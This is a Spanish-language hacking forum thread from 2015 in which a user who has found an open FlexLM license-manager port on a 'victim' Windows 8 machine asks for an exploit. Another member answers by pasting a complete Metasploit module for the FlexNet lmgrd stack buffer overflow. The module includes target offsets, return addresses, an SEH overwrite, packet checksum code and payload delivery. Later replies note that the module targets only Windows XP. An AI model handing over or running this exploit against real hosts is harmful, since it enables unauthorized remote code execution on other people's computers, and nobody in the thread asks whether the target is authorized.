comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Duda con servicio FLEXLM y exploit para el mismo

  • 7 Respuestas
  • 4071 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado natalioruis

  • *
  • Underc0der
  • Mensajes: 139
  • Actividad:
    6.67%
  • Reputación 0
    • Ver Perfil
« en: Junio 17, 2015, 09:12:49 pm »
Hola cómo va? yo aca sigo jugueteando con mi kalilinux asique dandome rosca con esto...
estaba hacinedo unas pruebas y encontre que un puerto de la pc victima (que tinee un windows 8  )
 estaba abierto y corria el FLEXLM0, cuadno pude lograr que el nmap me diera mas info decia, 'flexlm license manager'  aun no comprendo bien que es este servicio...

y la otra ocnsulta es si existe algu nexploit para utilizar este puerto abierto?


gracias

« Última modificación: Junio 17, 2015, 09:15:18 pm por Gabriela »
..:: El Hombrecito del sombrero Gris ::..

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1913
  • Actividad:
    5%
  • Reputación 15
    • Ver Perfil
« Respuesta #1 en: Junio 18, 2015, 06:52:36 am »
Revisa este exploit para metasploit, de todas formas dependerá de la versión que utilice

Código: C
  1. ##
  2. # This file is part of the Metasploit Framework and may be subject to
  3. # redistribution and commercial restrictions. Please see the Metasploit
  4. # web site for more information on licensing and terms of use.
  5. #   http://metasploit.com/
  6. ##
  7.  
  8. require 'msf/core'
  9.  
  10. class Metasploit3 < Msf::Exploit::Remote
  11.     Rank = NormalRanking
  12.  
  13.     include Msf::Exploit::Remote::Tcp
  14.     include Msf::Exploit::Remote::Seh
  15.  
  16.     def initialize(info = {})
  17.         super(update_info(info,
  18.             'Name'           => 'FlexNet License Server Manager lmgrd Buffer Overflow',
  19.             'Description'    => %q{
  20.                     This module exploits a vulnerability in the FlexNet
  21.                 License Server Manager.
  22.  
  23.                 The vulnerability is due to the insecure usage of No tienes permisos para ver links. Registrate o Entra con tu cuenta
  24.                 in the lmgrd service when handling network packets, which
  25.                 results in a stack buffer overflow.
  26.  
  27.                 In order to improve reliability, this module will make lots of
  28.                 connections to lmgrd during each attempt to maximize its success.
  29.             },
  30.             'Author'         =>
  31.                 [
  32.                     'Luigi Auriemma', # Vulnerability Discovery and PoC
  33.                     'Alexander Gavrun', # Vulnerability Discovery
  34.                     'juan vazquez', # Metasploit module
  35.                     'sinn3r' # Metasploit module
  36.                 ],
  37.             'License'        => MSF_LICENSE,
  38.             'References'     =>
  39.                 [
  40.                     [ 'OSVDB', '81899' ],
  41.                     [ 'BID', '52718' ],
  42.                     [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-052/' ],
  43.                     [ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ]
  44.                 ],
  45.             'Privileged'     => true,
  46.             'DefaultOptions' =>
  47.                 {
  48.                     'EXITFUNC' => 'process'
  49.                 },
  50.             'Payload' =>
  51.                 {
  52.                     'Space' => 4000
  53.                 },
  54.             'Platform'       => 'win',
  55.             'Targets'        =>
  56.                 [
  57.                     [ 'Debug', {} ],
  58.                     [ 'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',
  59.                         {
  60.                             'Offset' => 10476,
  61.                             'ShellcodeOffset' => 5504,
  62.                             'Ret' => 0x0047d01f # ppr from lmgrd.exe
  63.                         }
  64.                     ],
  65.                     [ 'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',
  66.                         {
  67.                             'Offset' => 7324,
  68.                             'ShellcodeOffset' => 2332,
  69.                             'Ret' => 0x004eda91 # ppr from lmgrd.exe
  70.                         }
  71.                     ],
  72.                     [ 'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',
  73.                         {
  74.                             'Offset' => 7320,
  75.                             'ShellcodeOffset' => 2328,
  76.                             'Ret' => 0x004eb2e1 # ppr from lmgrd.exe
  77.                         }
  78.                     ],
  79.                 ],
  80.             'DefaultTarget'  => 1,
  81.             'DisclosureDate' => 'Mar 23 2012'))
  82.  
  83.         register_options(
  84.             [
  85.                 Opt::RPORT(27000),
  86.                 OptInt.new('Attempts', [ true, 'Number of attempts for the exploit phase', 20 ]),
  87.                 OptInt.new('Wait', [ true, 'Delay between brute force attempts', 2 ]),
  88.                 OptInt.new('Jam', [ true, 'Number of requests to jam the server', 100 ])
  89.             ], self.class)
  90.     end
  91.  
  92.     def header_checksum(packet)
  93.         packet_bytes = packet.unpack("C*")
  94.         checksum = packet_bytes[0]
  95.         i = 2
  96.         while i < 0x14
  97.             checksum = checksum + packet_bytes[i]
  98.             i = i + 1
  99.         end
  100.         return (checksum & 0x0FF)
  101.     end
  102.  
  103.     def data_checksum(packet_data)
  104.         word_table = ""
  105.         i = 0
  106.         while i < 256
  107.             v4 = 0
  108.             v3 = i
  109.             j = 8
  110.  
  111.             while j > 0
  112.                 if ((v4 ^ v3) & 1) == 1
  113.                     v4 = ((v4 >> 1) ^ 0x3A5D) & 0x0FFFF
  114.                 else
  115.                     v4 = (v4 >> 1) & 0x0FFFF
  116.                 end
  117.                 v3 >>= 1
  118.                 j = j - 1
  119.             end
  120.  
  121.             word_table << [v4].pack("S")
  122.             i = i + 1
  123.         end
  124.         k = 0
  125.         checksum = 0
  126.         data_bytes = packet_data.unpack("C*")
  127.         word_table_words = word_table.unpack("S*")
  128.         while k < packet_data.length
  129.             position = data_bytes[k] ^ (checksum & 0x0FF)
  130.             checksum = (word_table_words[position] ^ (checksum >> 8)) & 0x0FFFF
  131.             k = k + 1
  132.         end
  133.         return checksum
  134.     end
  135.  
  136.     def create_packet(data)
  137.         pkt = "\x2f"
  138.         pkt << "\x00" # header checksum
  139.         pkt << "\x00\x00" # data checksum
  140.         pkt << "\x00\x00" # pkt length
  141.         pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  142.         pkt << data
  143.  
  144.         pkt[4,2] = [pkt.length].pack("n")
  145.  
  146.         data_sum = data_checksum(pkt[4, pkt.length - 4])
  147.         pkt[2, 2] = [data_sum].pack("n")
  148.  
  149.         hdr_sum = header_checksum(pkt[0, 20])
  150.         pkt[1] = [hdr_sum].pack("C")
  151.  
  152.         return pkt
  153.     end
  154.  
  155.     def jam
  156.         pkt = create_packet("")
  157.  
  158.         datastore['Jam'].times do
  159.             connect
  160.             sock.put(pkt)
  161.             disconnect
  162.         end
  163.     end
  164.  
  165.     def exploit
  166.         i = 1
  167.         while i <= datastore['Attempts'] and not session_created?
  168.             print_status("Attempt #{i}/#{datastore['Attempts']} to exploit...")
  169.             do_exploit
  170.             sleep(datastore['Wait'])
  171.             i = i + 1
  172.         end
  173.  
  174.         if not session_created?
  175.             print_error("Exploit didn't work after #{i} attempts")
  176.         end
  177.     end
  178.  
  179.     def do_exploit
  180.         t = framework.threads.spawn("jam", false) { jam }
  181.         my_payload = payload.encoded
  182.  
  183.         header_length = 20 # See create_packet() to understand this number
  184.         pkt_data = ""
  185.         if target.name =~ /Debug/
  186.             pkt_data << "a" * (65535 - header_length)
  187.         else
  188.             pkt_data << "a" * target['ShellcodeOffset']
  189.             pkt_data << my_payload
  190.             pkt_data << rand_text(target['Offset']-target['ShellcodeOffset']-my_payload.length)
  191.             pkt_data << generate_seh_record(target.ret)
  192.             pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string
  193.             pkt_data << rand_text(65535 - pkt_data.length - header_length)
  194.         end
  195.  
  196.         pkt = create_packet(pkt_data)
  197.  
  198.         connect
  199.         sock.put(pkt)
  200.         handler
  201.         disconnect
  202.     end
  203.  
  204. end



Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #2 en: Junio 18, 2015, 11:48:09 am »
Hola que tal, por si no sabes Metasploit es bastante amigable para realizar alguna busqueda con search (LO QUE BUSCAS) O en otro caso ir a rapid7 y buscas en el caso de que no tengas actualizado a la ultima versión referente a los exploits por cierto hoy lanzarón nuevos recursos.

Por otro parte el servicio, que nombras si la memoria no me falla es alguno servicio de los productos de Embarcadero algo de google no viene mal para revisar y validar, por otro lado el comentario de Black hace referencia un exploit que hace un Buffer Overflow y en los targets no esta el Win8 xD. ademas que va pa otro lado el target!!! ;)

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
            'Targets'        =>
                [
                    [ 'Debug', {} ],
                    [ 'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',
                        {
                            'Offset' => 10476,
                            'ShellcodeOffset' => 5504,
                            'Ret' => 0x0047d01f # ppr from lmgrd.exe
                        }
                    ],
                    [ 'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',
                        {
                            'Offset' => 7324,
                            'ShellcodeOffset' => 2332,
                            'Ret' => 0x004eda91 # ppr from lmgrd.exe
                        }
                    ],
                    [ 'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',
                        {
                            'Offset' => 7320,
                            'ShellcodeOffset' => 2328,
                            'Ret' => 0x004eb2e1 # ppr from lmgrd.exe
                        }
                    ],
                ],

Ahí se ve lo mencionado va para Windows XP.. Espero te sirva el aporte.

PD: Ja jaj ja jaja cada respuesta que veo....

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado natalioruis

  • *
  • Underc0der
  • Mensajes: 139
  • Actividad:
    6.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Junio 21, 2015, 07:27:01 pm »
ok gracias, entonces or el momento no hay para windows 8 con el flex aun?

..:: El Hombrecito del sombrero Gris ::..

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #4 en: Junio 22, 2015, 11:08:39 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
ok gracias, entonces or el momento no hay para windows 8 con el flex aun?

Revisaste por tu cuenta o solo haces uso del foro como fuente de información?

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado natalioruis

  • *
  • Underc0der
  • Mensajes: 139
  • Actividad:
    6.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Junio 22, 2015, 12:34:12 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
ok gracias, entonces or el momento no hay para windows 8 con el flex aun?

Revisaste por tu cuenta o solo haces uso del foro como fuente de información?

Regards,
Snifer



no estari entendiendo tu comentario..... y de todas formas, el foro no es una fuete de información? de intercambio y aprendizaje?
..:: El Hombrecito del sombrero Gris ::..

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #6 en: Junio 22, 2015, 01:14:28 pm »
El foro lo es! solo que te digo si revisaste por tu propia cuenta? no solo tomes como base lo que esta en el foro o lo que dice en el, si te digo que metasploit es usado de mejor forma en Arch me creerias o revisarias lo que te digo???

Regards,
Snifer

PD: Revisa y compara lo que te dicen los demás para sacar tus propias conclusiones no lo que dice una persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado natalioruis

  • *
  • Underc0der
  • Mensajes: 139
  • Actividad:
    6.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Junio 23, 2015, 01:54:07 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
El foro lo es! solo que te digo si revisaste por tu propia cuenta? no solo tomes como base lo que esta en el foro o lo que dice en el, si te digo que metasploit es usado de mejor forma en Arch me creerias o revisarias lo que te digo???

Regards,
Snifer

PD: Revisa y compara lo que te dicen los demás para sacar tus propias conclusiones no lo que dice una persona.
fue solo un mal entendido de espreción...

comprendo l oque me dices =)
..:: El Hombrecito del sombrero Gris ::..

 

¿Te gustó el post? COMPARTILO!



Crear un archivo .vbs para ejecutar un archivo .bat en invisible

Iniciado por NMS

Respuestas: 2
Vistas: 4428
Último mensaje Marzo 13, 2017, 10:37:57 pm
por sadfud
[SOLUCIONADO] Desencriptacion de una imagen para extraer la imagen original

Iniciado por stuxnet13

Respuestas: 3
Vistas: 1259
Último mensaje Enero 07, 2016, 07:55:01 pm
por blackdrake
allegro 5,opngl,sdk para fan game modo storyboard game

Iniciado por Mr.Tru

Respuestas: 2
Vistas: 335
Último mensaje Mayo 23, 2018, 01:19:20 pm
por Mr.Tru
Cómo uso la "/" para hacer un select en una tabla

Iniciado por tetano32

Respuestas: 3
Vistas: 923
Último mensaje Diciembre 20, 2017, 04:41:12 pm
por tetano32
[SOLUCIONADO] Ayuda para encontrar "airdecrypt"

Iniciado por Typh0n

Respuestas: 2
Vistas: 3871
Último mensaje Enero 13, 2014, 07:11:18 am
por aika